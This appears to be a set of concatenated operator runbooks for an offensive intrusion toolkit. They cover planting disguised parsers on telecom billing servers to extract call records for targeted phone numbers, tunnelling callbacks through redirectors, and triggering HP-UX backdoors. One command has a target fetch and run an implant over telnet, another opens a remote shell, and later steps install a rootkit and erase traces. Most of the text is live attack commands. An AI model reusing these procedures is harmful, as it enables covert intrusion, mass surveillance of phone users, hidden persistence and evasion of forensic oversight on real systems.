-cd /tmp/.scsi
-put /current/up/orleansstride.v1.0.SunOS5.8.targetsl nscd
##### Upload the encrypted phone list as awk, modify each parser command to hav
e the
.enc)
2, etc.)
TIME ALLOWS
############ argfile 1
-put /current/down/argfiles/argfile1.enc awk
-setenv B=-k CRYPTKEY -z "find /archive/cdrc/ -name '2006071[789]*.mob' -print"
-P ./awk
./nscd >T:/current/down/cdrhits.orleansstride.HOST.DDMonYY.enc1
-beep 15
-setenv B=-k CRYPTKEY -z "find /archive/cdrc/ -name '2006071[56]*.mob' -print" -
P ./awk
./nscd >T:/current/down/cdrhits.orleansstride.HOST.DDMonYY.enc1.more
-beep 15
############ argfile 2
-P ./awk
-beep 15
P ./awk
-beep 15
############ argfile 3
-P ./awk
-beep 15
P ./awk
-beep 15
######
###### survey mode:
######
x
./nscd >T:/current/down/cdrhits.orleansstride.HOST.DDMonYY.enc.surveyIMEI
y
./nscd >T:/current/down/cdrhits.orleansstride.HOST.DDMonYY.enc.surveyMSC
######
######
cd /current/down
ls -latr cdr*enc*
cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.orleansstride.HOST.DDMonYY.enc
1 -o cdrhits.orleansstride.HOST.DDMonYY.txt1 -k CRYPTKEY -d -c
cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.orleansstride.HOST.DDMonYY.enc
2 -o cdrhits.orleansstride.HOST.DDMonYY.txt2 -k CRYPTKEY -d -c

cd /current/down
ls -latr cdr*txt*
######
### ps -ef |grep nscd
### kill -9 <PID>
######
######
ls -l cdr*txt*
mz
uz
#####
##### clean up
#####
-rm nscd awk
-lt
-cd /tmp
-rm .scsi
-lt
w
ps -ef | sort
-lt /
-burnBURN
###
### END File user.tool.orleansstride.COMMON
### (see also ../etc/user.tool.orleansstride.COMMON)
###
### BEGIN File user.tool.skimcountry.COMMON (see also ../etc/user.tool.skimcou
ntry.COMMON)
###
################ SKIMCOUNTRY #########################
############### PARSING #######################################################
############

mx
:%s/HOST/HOST/g
'x
echo CRYPTKEY > /current/down/cryptkey.skimcountry.DDMonYY
mz
#or
ls -altr
pty
### line and save)
### "file" results:
cat arg*
file arg*
dos2unix arg*
file arg*
ine
# s123456789 - IMSI
# e123456789 - IMEI
### These date ranges will be used as args in the skimcountry commands.
### Typical file locations per project:

########################## wrathhatch:
# HOST 172.16.1.36
# active directories:
-lt /var/archive/output_billing
# this script should point to the backup directory location:
-vget /var/archive/output_billing/MoveData.sh
# backup directories:
-lt /u01/oradata/output_billing/
-lt /u01/oradata/output_billing/0-9AugData/output_billing
-lt /u01/oradata/output_billing/AugData/output_billing
# get time ranges of active directories:

ls -latr /var/archive/output_billing/isb/*ama | head -10
ls -latr /var/archive/output_billing/isb/*ama | tail -10
ls -latr /var/archive/output_billing/isb2/*ama | head -10
ls -latr /var/archive/output_billing/isb2/*ama | tail -10
ls -latr /var/archive/output_billing/isb/*ama | wc -l
ls -latr /var/archive/output_billing/fsd1/*ama | head -10
ls -latr /var/archive/output_billing/fsd1/*ama | tail -10
### to pull a complete directory listing to the ops box:

ls -latr /var/archive/output_billing/isb >L:/current/down/list_isb
########################## SKIMCOUNTRY ########################################

################
################################################################################
###############
### Now, encrypt the ascii list locally... first make sure you have the encrypti
on tool:
EY -b
EY -b
file argfile*.enc
ls -l
file argfile*.enc
### Tips for running the SKIMCOUNTRY 3.2

### DO NOT _APPEND_ to the local file if using encryption - (no >>L: or >>T: )!!
!!
### per each argfile, create .enc1, .enc1.more, .enc1.more2, etc if addition
al
### DO NOT use -o if also using >L: or >T: (mixed output corrupts the decryption
)
### The phone list is deleted automatically now
### Useful options:

-k encryption key
-o print filenames being parsed
-P encrypted phone list
-p plaintxt phone list
-r DO NOT remove phone list after reading in
-z unix list of files to parse
-w do not encypt the output list (not recommended since file is cre
ated on target)
### Suggested -z options:

### this looks in subdirs, so use caution in backup dir (can be good AND bad):
### Also circumvents "parameter list too long" problem with wildcards with 'ls'
-z "find /share/a1338/ne_q3ic/nb/convert/output -name '0506132*dF*' -pri
nt"
### works, but only for smaller ranges (command line arglist gets long)
-z "ls -1rt /share/a1338/ne_q3ic/nb/convert/output/05110[3-6]*dF*"
.enc)
2, etc.)
TIME ALLOWS
### benchmarking:
# phonelist had 44 numbers
# 3 day pull took 38 minutes over ALL directories
# 1 day average pull took 10-13 minutes
### file name extensions:
# GCDR = Nor
# usd = Sie
######## Upload the parser (SKIMCOUNTRY) and called it crond
mkdir /tmp/.scsi
-cd /tmp/.scsi
-put /current/up/skimcountry.v1.2.SunOS5.9.targetdl crond
# or
-put /mnt/zip*/skimcountry.v1.2.SunOS5.9.targetdl crond
##### Upload the encrypted phone list as adm, then run the parser:
############ argfile 1
./crond -k CRYPTKEY -P adm -z "find /var/archive/output_billing -name 'MSC*06082
[2-4]*ama' -print" >T:/current/down/cdrhits.skimcountry.HOST.DDMonYY.enc1
-beep 15
[0-1]*ama' -print" >T:/current/down/cdrhits.skimcountry.HOST.DDMonYY.enc1.more
-beep 15
############ argfile 2
[2-4]*ama' -print" >T:/current/down/cdrhits.skimcountry.HOST.DDMonYY.enc2
-beep 15
[0-1]*ama' -print" >T:/current/down/cdrhits.skimcountry.HOST.DDMonYY.enc2.more
-beep 15
######
###### to parse other vendor files:
######
#./crond -k CRYPTKEY -P adm -z "ls -1rt /var/archive/output_billing/*/MSC*200606
29*usd*ama" > .mcftpl38755
######
######
cd /current/down
ls -latr cdr*enc*
cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.skimcountry.HOST.DDMonYY.enc1
-o cdrhits.skimcountry.HOST.DDMonYY.txt1 -k CRYPTKEY -d -c
cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.skimcountry.HOST.DDMonYY.enc2
-o cdrhits.skimcountry.HOST.DDMonYY.txt2 -k CRYPTKEY -d -c

cd /current/down
ls -latr cdr*txt*
######
### kill -9 <PID>
######
#### target cleanup

-rm adm crond
-cd /tmp
-rm .scsi
-burnBURN
### You're done!
###
### END File user.tool.skimcountry.COMMON
### (see also ../etc/user.tool.skimcountry.COMMON)
###
### BEGIN File user.tool.dairyfarm.COMMON (see also ../etc/user.tool.dairyfarm
.COMMON)
###
###################################################################
### DAIRYFARM
###################################################################
DAIRYFARM procedures:
mx
:%s/WINDOWS_REDIR_IP/WINDOWS_REDIR_IP/g
:%s/LINUX_OP_BOX_IP/192.168.254.71/g
:%s/WINDOWS_OP_BOX_IP/192.168.254.72/g
:%s/CONTROL_PORT/CONTROL_PORT/g
:%s/XSERVER_PORT/XSERVER_PORT/g
:%s/RAT_NAME/sendmail/g
:%s,TMP_DIR,/tmp/.scsi,g
`x
### Follow steps in this order:
### 1) on linux box, start dairyfarm client:

#./df_client 35535 127.0.0.1:40211
#./df_client CONTROL-PORT 127.0.0.1:XSERVER-PORT
./df_client CONTROL_PORT 127.0.0.1:XSERVER_PORT
### 2) on windows redir, set up tunnels:
### the next line replaces the normal tunnel to call back to the xserver port
### and references the df control port instead
#background redirect -tcp -implantlisten 35535 -target 192.168.254.131 35535 -no
des 40
#background redirect -tcp -implantlisten CONTROL-PORT -target LINUX-OP-BOX CONTR
OL-PORT -nodes 40
background redirect -tcp -implantlisten CONTROL_PORT -target LINUX_OP_BOX_IP CON
TROL_PORT -nodes 40
### to udp 177
#background redirect -udp -lplisten 177 -target 61.555.227.115 177 -maxpacketsiz
e 32000
#background redirect -udp -lplisten 177 -target TARGET-IP 177 -maxpacketsize 320
00
background redirect -udp -lplisten 177 -target TARGET_IP 177 -maxpacketsize 3200
0
### callback for netcat upload
#background redirect -tcp -implantlisten 33881 -target 192.168.254.131 33881 -no
des 40
#background redirect -tcp -implantlisten NETCAT-PORT -target LINUX-OPS-BOX NETCA
T-PORT -nodes 40
background redirect -tcp -implantlisten NETCAT_PORT -target LINUX_OP_BOX_IP NETC
AT_PORT -nodes 40
### callforward to nopen
#background redirect -tcp -lplisten 32754 -target 61.555.227.115 32754
#background redirect -tcp -lplisten NOPEN-PORT -target UNIX-TARGET-IP NOPEN-PORT
background redirect -tcp -lplisten NOPEN_PORT -target TARGET_IP NOPEN_PORT -bind
WINDOWS_OP_BOX_IP
### 3) on windows redir, upload dairyfarm.exe as something obscure (help16.exe)

and start:
#background run -command "help16.exe 40211 127.0.0.1:35535"
#background run -command "help16.exe XSERVER-PORT 127.0.0.1:CONTROL-PORT"
background run -command "help16.exe XSERVER_PORT 127.0.0.1:CONTROL_PORT"
### 4) on linux, set up to launch YS, using appropriate wrap script:
cd /current/up
file noserver
# cp appropriate noserver from morerats to /current/up
# Need to noprep it? Different listener port (default is 32754)
#noprep noserver -lNOPEN_PORT
noprep noserver -lNOPEN_PORT
#packrat -n /current/bin/nc.YS sendmail noserver.new 33881
#packrat -n /current/bin/nc.YS RAT_NAME noserver.new NETCAT-PORT
packrat -n /current/bin/nc.YS RAT_NAME noserver.new NETCAT_PORT
#./wrap-aix.sh -l 61.555.227.110 -r sendmail -p 33881 -x 40211 -d /tmp/.scsi
#./wrap-hpux.sh -l 61.555.227.110 -r sendmail -p 33881 -x 40211 -d /tmp/.scsi
#./wrap-sun.sh -l WIN-TARGET-IP -r RAT_NAME -p NETCAT-PORT -x XSERVER-PORT -d TM
P_DIR
./wrap-sun.sh -l WINDOWS_REDIR_IP -r RAT_NAME -p NETCAT_PORT -x XSERVER_PORT -d
TMP_DIR
#./xc -x 61.555.227.110 -y 40211 -s 61.555.227.110 192.168.254.72
#./xc -x WIN-TARGET-IP -y XSERVER-PORT -s WIN-TARGET-IP WINDOWS-OP-BOX
./xc -x WINDOWS_REDIR_IP -y XSERVER_PORT -s WINDOWS_REDIR_IP WINDOWS_OP_BOX_IP
### 5) connect to nopen AFTER you control-c the netcat window:

#noclient 192.168.254.72:32754
noclient WINDOWS_OP_BOX_IP:NOPEN_PORT
### 6) on linux, control-C the df_client window
### 7) on windows, the dairyfarm.exe (renamed as help16.exe or whatever) should
### go away from the process listing; You can now remove it from the target.
###
### END File user.tool.dairyfarm.COMMON
### (see also ../etc/user.tool.dairyfarm.COMMON)
###
### BEGIN File user.tool.trigger_hpux_jl_in.COMMON (see also ../etc/user.tool.
trigger_hpux_jl_in.COMMON)
###
###############################################################
# TRIGGERING HPUX INCISION via JACKLADDER and JACKLADDERHELPER
###############################################################
### BACKGROUND:
### HP-INCISION provides process and file hiding. It does NOT provide
### connection hiding nor does it have a triggering capability in this
### version (1.1.2.1 for HPUX11.00)
### HP-JACKLADDER differs from other JACKLADDERs because it requires the use
### of special source ports for triggering. The purpose of the special source
### ports is two-fold: it plays a part in the authentication process for the
### trigger, and it causes the 'accept' call to wait an extra 5 seconds for
### input, thus allowing it to work via most redirection (as long as the
### roundtrip time between the redirector and the target is less than 5
### seconds.)
### JACKLADDERHELPER is an "instant-grat" version listening on an extra port.
### It only listens until the target reboots.
### On HPUX, it is typically installed on port 7162 running as 'memlogd'.
### JACKLADDER will take over once the target reboots. Depending on how it
### was installed, it will listen on ports started by inetd (check
### /etc/inetd.conf) or on the sendmail port.
### The HP-JACKLADDER and HP-JACKLADDERHELPER special source ports are:
### 3, 51, 8213, 12634, 16798, 23247
HP-TARGET-IP self-explanatory
HP-JL-SOURCE-PORT 3, 51, 8213, 12634, 16798, or 23247
JL-LISTEN-PORT before target reboots - double-check but probably 7162;
after target reboots - double-check, but probab
ly try (13,
21, 23, 37, 113)
NETCAT-PORT random for uploading nopen
LINUX-OP-BOX local Linux machine (probably 192.168.254.71)
WIN-OP-BOX local Windows machine (probably 192.168.254.72)
UNIX-REDIR-IP IP that target will call back to
WIN-REDIR-IP IP that target will call back to
NOPEN_DIR directory to upload nopen to (/tmp/.scsi usually)
(WILL NEED TO ESCAPE SLASHES)
NOPEN_NAME name of nopen on target
NOPEN_PORT port to run nopen on
mx
:%s/HP_TARGET_IP/HP_TARGET_IP/g
:%s/HP_JL_SOURCE_PORT/HP_JL_SOURCE_PORT/g
:%s/JL_LISTEN_PORT/JL_LISTEN_PORT/g
:%s/LINUX_OP_BOX/LINUX_OP_BOX/g
:%s/WIN_OP_BOX/WIN_OP_BOX/g
:%s/UNIX_REDIR_IP/UNIX_REDIR_IP/g
:%s/WIN_REDIR_IP/WIN_REDIR_IP/g
:%s/NOPEN_DIR/NOPEN_DIR/g
:%s/NOPEN_NAME/NOPEN_NAME/g
'x
#########################################################
### TO CONNECT TO JACKLADDER* thru solaris box:
#########################################################
### Verify the JACKLADDERHELPER port is still listening
### If the port doesn't respond, the target may have rebooted or JACKLADDER_HELP
ER died
### "Connection refused" means that the port isn't listening
### Otherwise scan for ports that should be started by inetd
### jackladderhelper port is probably 7162
-scan JL_LISTEN_PORT TARGET_IP
### On Solaris redirector:
-jackpop HP_TARGET_IP JL_LISTEN_PORT UNIX_REDIR_IP HP_JL_SOURCE_PORT
Your Choice[1] 1
UTC offset? [0]
Which port will we be uploading nopen on? [44841] NETCAT_PORT
Which port would you like nopen to listen on? [48970] NOPEN_PORT
Nopen to upload[] CORRECT_NOSERVER_FROM_MORERATS
Which directory would you like to create[/tmp/.dskman] NOPEN_DIR
What would you like nopen called on target [podd] NOPEN_NAME
Do you want incision to bless the nopen server? [Yn] Y
Continue? [Yn] Y
### after the upload completes:
### close both jackpop windows,
### type DONE in -jackpop window
### connect using the -nstun command given by the -jackpop window
############ GO TO WEARCUP SECTION NOW IF SUCCESSFUL #########
######## TROUBLESHOOTING ONLY - avoid syntax errors with commands being executed
on target!:
### Test JL from redirector:
### special source ports: 3, 51, 8213, 12634, 16798, 23247
### Probably need to redirect output (2>&0 1>&0 as below) for every
### command run
-jackpop HP_TARGET_IP JL_LISTEN_PORT UNIX_REDIR_IP HP_JL_SOURCE_PORT
3
0
Y
date 2>&0 1>&0
DONE
##############################################################
### TO CONNECT TO HP-UX JACKLADDER* thru non-Solaris Unix box:
##############################################################
### Window 1 on Unix redirector:
-tunnel
l JL_LISTEN_PORT HP_TARGET_IP JL_LISTEN_PORT HP_JL_SOURCE_PORT
r NETCAT_PORT
### Window 2 on Unix redirector:
# If nopen calling back:
-nrtun NOPEN_PORT
# If calling into nopen, don't run this until you run window 4 cmd
# and nopen appears to be successfully uploaded
-nstun HP_TARGET_IP:NOPEN_PORT
### Window 3 local
packrat NOPEN_NAME CORRECT_NOSERVER_IN_MORERATS NETCAT_PORT
### Window 4 local and scripted
# If calling forward into nopen:
LD_PRELOAD=/current/bin/connect.so CMD="mkdir NOPEN_DIR; cd NOPEN_DIR; telnet UN
IX_REDIR_IP NETCAT_PORT </dev/console >NOPEN_NAME.uu; uudecode NOPEN_NAME.uu ; u
ncompress -f NOPEN_NAME.Z; chmod 700 NOPEN_NAME; export PATH=.; export D=-lNOPEN
_PORT; NOPEN_NAME" RA=UNIX_REDIR_IP RP=HP_JL_SOURCE_PORT HIDEME= nc 127.0.0.1 JL
_LISTEN_PORT
# If nopen is calling back:
LD_PRELOAD=/current/bin/connect.so CMD="mkdir NOPEN_DIR; cd NOPEN_DIR; telnet UN
IX_REDIR_IP NETCAT_PORT </dev/console >NOPEN_NAME.uu; uudecode NOPEN_NAME.uu ; u
ncompress -f NOPEN_NAME.Z; chmod 700 NOPEN_NAME; export PATH=.; export D=-cUNIX_
REDIR_IP:NOPEN_PORT; export S=30; NOPEN_NAME" RA=UNIX_REDIR_IP RP=HP_JL_SOURCE_P
ORT HIDEME= nc 127.0.0.1 JL_LISTEN_PORT
### TROUBLESHOOTING: CMD can be changed to be any string of shell commands.
### If output from any command in the string desired, you may have to append
### the string "2>&0 1>&0" to each command
### i.e. "ls -la /tmp 2>&0 1>&0; uname -a 2>&0 1>&0"
###
### NOTE: you cannot remove or overwrite a running binary on HP-UX, so if
### you are trying to overwrite something during troubleshooting, this may
### be why
#########################################################
### TO CONNECT TO JACKLADDER* thru windows box:
#########################################################
### from windows target, scan JACKLADDERHELPER to see if it's still listening:
banner -ip HP_TARGET_IP -port JL_LISTEN_PORT
### windows tunnels:
### ----------------
# Examples to connect, connect back to packrat window to upload nopen, and -nstu
n to target:
### connect to JACKLADDER*
### background redirect -tcp -lplisten JL-LISTEN-PORT -target HP-TARGET-IP JL-LI
STEN-PORT HP-JL-SOURCE-PORT -bind WIN-OP-BOX
### background redirect -tcp -lplisten 7162 -target 10.27.50.41 7162 12634 -bind
192.168.254.72
background redirect -tcp -lplisten JL_LISTEN_PORT -target HP_TARGET_IP JL_LISTEN
_PORT HP_JL_SOURCE_PORT -bind WIN_OP_BOX
### callback to PACKRAT window

### background redirect -tcp -implantlisten NETCAT-PORT -target LINUX-OP-BOX NET
CAT-PORT
### background redirect -tcp -implantlisten 39778 -target 192.168.254.71 39778
background redirect -tcp -implantlisten NETCAT_PORT -target LINUX_OP_BOX NETCAT_
PORT
### call forward to NOPEN PORT (default listen port = 32754)

### background redirect -tcp -lplisten 32754 -target HP-TARGET-IP 32754 -bind WI
N-OP-BOX
### background redirect -tcp -lplisten 32754 -target 10.27.50.41 32754 -bind 192
.168.254.72
background redirect -tcp -lplisten NOPEN_PORT -target HP_TARGET_IP NOPEN_PORT -b
ind WIN_OP_BOX
### additional nopen windows (increment the lplisten port only):
### background redirect -tcp -lplisten 32755 -target HP-TARGET-IP 32754 -bind WI
N-OP-BOX
### background redirect -tcp -lplisten 32755 -target 10.27.50.41 32754 -bind 192
.168.254.72
background redirect -tcp -lplisten ANOTHER_PORT -target HP_TARGET_IP NOPEN_PORT
-bind WIN_OP_BOX
background redirect -tcp -lplisten ANOTHER_ANOTHER_PORT -target HP_TARGET_IP NOP
EN_PORT -bind WIN_OP_BOX
### local linux:
### -----------
# RA = redirector address
# RP = redirector source port
# In local window
packrat NOPEN_NAME CORRECT_NOSERVER_IN_MORERATS NETCAT_PORT
### in a local scripted window:
LD_PRELOAD=/current/bin/connect.so CMD="mkdir NOPEN_DIR; cd NOPEN_DIR; telnet WI
N_REDIR_IP NETCAT_PORT </dev/console >NOPEN_NAME.uu; uudecode NOPEN_NAME.uu ; un
compress -f NOPEN_NAME.Z; chmod 700 NOPEN_NAME; export PATH=.; export D=-lNOPEN_
PORT; nscd" RA=WIN_REDIR_IP RP=HP_JL_SOURCE_PORT HIDEME= nc WIN_OP_BOX JL_LISTEN
_PORT
### once the target uploads nopen, the LD_PRELOAD window should give you a promp
t back;
### you can then connect to nopen:
noclient WIN_OP_BOX:NOPEN_PORT
noclient WIN_OP_BOX:ANOTHER_PORT
noclient WIN_OP_BOX:ANOTHER_ANOTHER_PORT
######## TROUBLESHOOTING ONLY - avoid syntax errors with commands being executed
on target!:
### to run a command on target (do not string together multiple commands):
### LD_PRELOAD=./connect.so.RHEL4 CMD="uname -a" RA=WIN-REDIR-IP RP=HP-JL-SOURCE
-PORT telnet WIN-OP-BOX JL-LISTEN-PORT
### LD_PRELOAD=./connect.so.RHEL4 CMD="uname -a" RA=10.27.50.50 RP=HP-JL-SOURCE-
PORT telnet 192.168.254.72 7162
LD_PRELOAD=/current/bin/connect.so CMD="uname -a" RA=WIN_REDIR_IP RP=HP_JL_SOURC
E_PORT nc WIN_OP_BOX JL_LISTEN_PORT
### to create a file on target:
### LD_PRELOAD=./connect.so.RHEL4 CMD="touch /tmp/.scsi/x " RA=WIN-REDIR-IP RP=H
P-JL-SOURCE-PORT telnet WIN-OP-BOX JL-LISTEN-PORT
### LD_PRELOAD=./connect.so.RHEL4 CMD="touch /tmp/.scsi/x" RA=10.27.50.50 RP=HP-
JL-SOURCE-PORT telnet 192.168.254.72 7162
LD_PRELOAD=/current/bin/connect.so CMD="touch /tmp/.scsi/x" RA=WIN_REDIR_IP RP=H
P_JL_SOURCE_PORT nc WIN_OP_BOX JL_LISTEN_PORT
### to get an interactive window:
### LD_PRELOAD=./connect.so.RHEL4 CMD="/bin/sh 2>&0 1>&0" RA=WIN-REDIR-IP RP=HP-
JL-SOURCE-PORT nc WIN-OP-BOX JL-LISTEN-PORT
### LD_PRELOAD=./connect.so.RHEL4 CMD="/bin/sh 2>&0 1>&0" RA=10.27.50.50 RP=HP-J
L-SOURCE-PORT nc 192.168.254.72 7162
LD_PRELOAD=./connect.so.RHEL4 CMD="/bin/sh 2>&0 1>&0" RA=WIN_REDIR_IP RP=HP_JL_S
OURCE_PORT nc WIN_OP_BOX JL_LISTEN_PORT
#########################################################
# Running WEARCUP and NOT using -burn
#########################################################
### Once connected, you will be in your temporary directory and will need
### to clean it up. However, HPUX systems will not allow you to delete an
### executable if it's running, nor the directory it's running in. To
### circumvent this, use 'cup' (CleanUp)
-lt
-rm nscd.uu
-gs wearcup -h
# change the options for what you want to call cup and how long you want cup
# to sleep before it kills nopen and cleans your working directory,
# then run it
-gs wearcup -r snmpd -w 4h
# when it is time to end the op, kill the "sleep" pid to start immediate cleanup
# to extend the op, kill the pid of the script (now called snmpd) then kill the
sleep
# DO NOT -burnBURN !!!!!!
# use -exit for your windows!!!!!
#########################################################
### HP-INCISION technique checks
#########################################################
### Check if JACKLADDERHELPER is still running:

ps -ef |grep memlogd
### Verify the hidden directory is visible from your hidden process:
-lt /lost+found/3d9892354a360245add0f483f269f384
### Verify the hidden directory is no longer visible when you're in /dev:
cd /dev; ls -la /lost+found/3d9892354a360245add0f483f269f384
### system kernel checks:
### get system configuration value for CPU_VERSION; should return 532
/usr/bin/getconf SC_CPU_VERSION
### get system configuration value for KERNEL_BITS; should return 64
/usr/bin/getconf SC_KERNEL_BITS
### get the status of any kernel modules that are currently loaded
### if under INCISION, should see krm and krm64
kmadmin -s
### check reboot history
last -15 reboot
### check and pull logs
-lt /var/adm/syslog/syslog*
-get /var/adm/syslog/syslog*
-lt /etc/rc.log*
-get /etc/rc.log*
-lt /var/adm/crash
-lt /*history
-lt /root/*history
-vget /*history /root/*history
#########################################################
###
### END File user.tool.trigger_hpux_jl_in.COMMON
### (see also ../etc/user.tool.trigger_hpux_jl_in.COMMON)
###
### BEGIN File user.tool.stoicsurgeon.COMMON (see also ../etc/user.tool.stoics
urgeon.COMMON)
###
##### Stoicsurgeon Ctrl Usage, Installation and Troubleshooting Script #####
### WARNING! READ THIS! WARNING! READ THIS! WARNING! READ THIS! WARNING! ###
#
# NEVER explicitly reference any cloaked file or directory from an unprivileged
# process. Wildcards are ok, but explicit references are not. Stoic will
# self-destruct if an explicit reference to a cloaked file ever occurs from an
# unprivileged process. This includes the cloaked directory, any files inside
# the cloaked directory, any files/directories hidden after installation using
# Ctrl, the /proc entry of cloaked processes, etc.
#
# Examples:
# Assume /lib/.0123456789abcdef is a cloaked file or directory
# -lt /lib/.0123456789abcdef ##### BAD BAD BAD BAD BAD #####
# -lt /lib/.012* ##### GOOD, WILL NOT SEE OUTPUT FOR CLOAKED DIR,
# ##### WILL NOT SELF-DESTRUCT
#
# Assume 12345 is a cloaked process
# -lt /proc/12345/exe ##### BAD BAD BAD BAD BAD #####
# -lt /proc/*/exe ##### GOOD, WILL NOT SEE OUTPUT FOR 12345
# ##### WILL NOT SELF-DESTRUCT
#
# The cloaked directory will be in one of the following directories:
# (the first one of these directories that exists and is on the same disk
# partition as the root of the filesystem "/", see output from "df" or
# "mount" commands)
# -lt /var/tmp
# -lt /lib
# -lt /dev
# -lt /etc
# -lt /
#
# Refer to what the `pwd` from triggering Dewdrop returned if possible
#
### END WARNING END WARNING END WARNING END WARNING END WARNING END WARNING ###
########## Global Search/Replace commands ##########

## Target IP: IP address of newly deployed STOIC
## Target hostname: output from running "uname -n" on target
## Callback port: port for DD to call back to connect to ish (usually random)
## Redirector IP: IP for DD to call back to connect to ish
### Target hostname MUST be output from "uname -n" on TARGET!!!!!!!!!! ###
uname -n
mx
:%s/TARGET_HOSTNAME/TARGET_HOSTNAME/g
:%s/CALLBACK_PORT/CALLBACK_PORT/g
:%s/REDIRECTOR_IP/REDIRECTOR_IP/g
'x
############################################################################
##### INSTALLATION #####
############################################################################
## First, make sure no other implants are installed, i.e. the family
# If Solaris
-strings /platform
## For Solaris, confirm can install against this kernel level

# Version number format: MAJORVERSION_MINORVERSION
# Valid patchlevels under "Kernel version": major version < 118833
# if = 118833, minor version <= 24
# Solaris 7 Sparc: major version < 106541
# major version == 106541, minor version <= 44
# Solaris 8 x86: major version < 108529
# Solaris 9 x86: major version < 118559
#
showrev -a
# If higher than these, DO NOT INSTALL and report this
-problem untested solaris patch level MAJORVERSION_MINORVERSION
## If installing on Linux, compare /proc/version with version being deployed
## Also compare hashes of installed kernels for another sanity check
-cat /proc/version
md5sum /boot/vmlinuz*
## upload STOICSURGEON Installation Package
-put /current/up/date date
## run STOICSURGEON Installation Package
PATH=. date
## Take note of the Date that is displayed, "00" in the seconds field means SUCC
ESS
## If the Seconds field does not show "00" take note of the entire date provided
and
## save data via notes or "-problem". A listing of possible values is located a
t the
## end of this script in the APPENDIX section.
-problem stoicsurgeon failed install, the date string was OUTPUT_FROM_DATE
## :30 error? On solaris 10, you get this if the kmdb module is loaded.
## Temporary workaround (as of 30 OCT 2007) is to remove it.
modinfo | grep kmdb
## Remove kmdb (NOT kmdbmod), the NUM here is the first column
## modunload -i NUM
modinfo | grep kmdb
## Then try again
-put /current/up/date date
PATH=. date
###################################################
### Trigger Dewdrop and verify SS is working ######
###################################################
### Below are commands to trigger DD without upload/execute, there
### will be no Nopen session, will have a prompt in the "ish" shell
### Possibility exists will have to play with options to ourtn/-irtun
### to trigger on certain ports, etc.
### Try THIS first (if redirecting from Nopen)
-irtun TARGET_IP CALLBACK_PORT -Y5
### or (if going direct)
ourtn -Y5 -p CALLBACK_PORT TARGET_IP
### for Dewdrop-3.X
tipoff-3.X --trigger-address TARGET_IP --target-address TARGET_IP --target-proto
col <tcp/udp> --target-port TARGET_PORT --callback-address CALLBACK_IP --callbac
k-port CALLBACK_PORT --start-ish
### look for output from "pwd" run after target calls back, the resulting
### directory is the SS hidden directory
## In Dewdrop window get the pid of DD connection to ish shell
echo $$
## set DD PID in the rest of the script
mx
:%s/DEWDROP_PID/DEWDROP_PID/g
`x
## In un-elevated Nopen window, verify Dewdrop connection and processes are cloa
ked
ps -ef | grep DEWDROP_PID
netstat -an | grep CALLBACK_PORT
## the hidden directory will be somewhere on the root filesystem,
## you can now do a directory listing of the hidden directory's parent
## in the un-elevated Nopen window to determine that it is indeed hidden
## (i.e. do "-ls /var/tmp" if hidden dir is "/var/tmp/.0123456789abcdef")
##
## REMINDER: DO NOT EXPLICITLY NAME HIDDEN FILES/DIRS FROM AN UNPRIVILEGED
## WINDOW (see top of script for more detailed explanation)
-ls /var/tmp
-ls /lib
-ls /dev
-ls /etc
-ls /
## Report any cloaking failures via notes or "-problem"
#######################################################################
##### IF NO PROBLEMS ENCOUNTERED, INSTALLATION COMPLETE #####
#######################################################################
#######################################################################
##### Ctrl Usage and Troubleshooting Instructions #####
#######################################################################
### Should have at least two Nopen windows: one to become privileged,
### other to stay unprivileged, for comparing outputs of commands
## get the PID of the Nopen window that will become privileged
-pid
## set Nopen PID in the rest of the script
mx
:%s/PRIVILEGED_NOPEN_PID/PRIVILEGED_NOPEN_PID/g
`x
########################################################
## Ctrl Usage Options:
# -C [pid | /file/path] Cloak the given process or file path
# -c [pid | /file/path] Uncloak the given process or file path
# -d Display default cloaked directory
# -E pid Enable the given process's ability to see otherwise
# cloaked processes and files.
# -e pid Disable the given process's ability to see
# otherwise cloaked processes and files.
# -F pid Enable the given process's ability to see otherwise
# cloaked files ONLY.
# -f pid Disable the given process's ability to see
# otherwise cloaked files ONLY.
# -P pid Enable the given process's ability to see otherwise cloaked
# processes ONLY.
# -p pid Disable the given process's ability to see otherwise cloaked
# processes ONLY.
# -K pid Designate a process as to be killed upon shutdown
# -k pid Designate a process as to NOT be killed upon shutdown
# -r /bin/sh Execute the given program as the root user
# -T signal Send the specified signal to all killable cloaked processes.
# -U Invoke a full uninstall (self destruct)
# -u Invoke a partial uninstall (unpatch and unload)
# -s path Set the times associated with a given file path
# -g path Get the times associated with a given file path
########################################################
## upload SS Control Utility using nopen
-put /current/up/Ctrl c
## or ftshell
~~p /current/up/Ctrl c
### If Nopen already a privileged process (i.e. started by a child of DD,
### etc.), do not need to set SEED variable to use Ctrl, otherwise SEED
### must be set
## SEED calculation algorithm. WARNING do this off target!!!
seedcalc TARGET_HOSTNAME
## if you don't have 'seedcalc'
echo -n TARGET_HOSTNAME | rev | tr -d '\n' | md5sum | cut -f1 -d' '
## if you don't have 'rev'
echo -n TARGET_HOSTNAME | sed '/\n/!G;s/$.$$.*\n$/&\2\1/;//D;s/.//' |
tr -d '\n' | md5sum | cut -f1 -d' '
## set value of SEED in the rest of the script
mx
:%s/CALCULATED_SEED/CALCULATED_SEED/g
`x
## REMINDER: DO NOT USE THIS OUTPUT EXPLICITLY IN AN UNPRIVILEGED PROCESS WHEN
## ACCESSING FILESYSTEM, SEE WARNING AT THE TOP OF THE SCRIPT
## WARNING: WHEN CLOAKING PROCESSES, MUST MAKE SURE THAT NO CLOAKED PROCESS IS
## IS THE PARENT OF AN UNCLOAKED PROCESS. IF NECESSARY TO HAVE A
## PROCESS UNCLOAKED, MUST UNCLOAK PARENTS ALL THE WAY TO INIT (i.e. if
## need an uncloaked Nopen, Nopen listener must be uncloaked as well)
## Use Ctrl to determine the name of the Cloaked directory
SEED=CALCULATED_SEED PATH=. c -d
## Use Ctrl to enable Nopen to see cloaked processes, connections and files.
SEED=CALCULATED_SEED PATH=. c -E PRIVILEGED_NOPEN_PID
## Use Ctrl to cloak the Nopen process, connections.
SEED=CALCULATED_SEED PATH=. c -C PRIVILEGED_NOPEN_PID
## Optional - Designate Nopen to NOT be killed should the implant be
## shutdown (self-destruct). You won't get any notification that this happened.
SEED=CALCULATED_SEED PATH=. c -k PRIVILEGED_NOPEN_PID
## Or, can do the above three actions in one command line
